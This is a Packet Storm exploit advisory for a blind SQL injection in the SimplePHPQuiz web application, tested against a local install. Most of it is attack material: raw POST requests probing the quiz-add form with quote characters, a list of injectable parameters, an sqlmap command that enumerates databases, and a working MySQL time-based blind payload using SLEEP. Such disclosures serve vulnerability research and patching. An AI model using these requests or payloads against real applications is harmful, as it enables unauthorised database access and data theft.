SimplePHPQuiz Blind SQL Injection

2016-08-24T00:00:00
ID PACKETSTORM:138494
Type packetstorm
Reporter HaHwul
Modified 2016-08-24T00:00:00

Description

                                        
                                            `# Exploit Title: SimplePHPQuiz - Blind SQL Injection  
# Date: 2016-08-23  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz  
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip  
# Version: [app version] (REQUIRED)  
# Version: Latest commit  
# Tested on: Debian [wheezy]  
  
  
### Vulnerability  
1-1. Nomal Request  
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1  
Host: 127.0.0.1  
..snip..  
Content-Length: 96  
  
question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit  
  
1-2 Response  
<div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">  
<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>  
  
2-1 Attack Request 1  
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1  
Host: 127.0.0.1  
..snip..  
Content-Length: 96  
  
question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit  
  
2-2 Response  
<div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">  
<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>  
  
3-1 Attack Request 2  
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1  
Host: 127.0.0.1  
..snip..  
Content-Length: 96  
  
question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit  
  
3-2 Response  
<div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">  
<p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p>  
  
  
### Weak Parameters  
correct_answer parameter  
question parameter  
wrong_answer1 parameter  
wrong_answer2 parameter  
wrong_answer3 parameter  
  
  
### SQLMAP Result  
#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer  
  
...snip...  
  
POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]   
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:  
---  
Parameter: correct_answer (POST)  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind (SELECT)  
Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit  
---  
[17:52:05] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.10  
  
  
  
`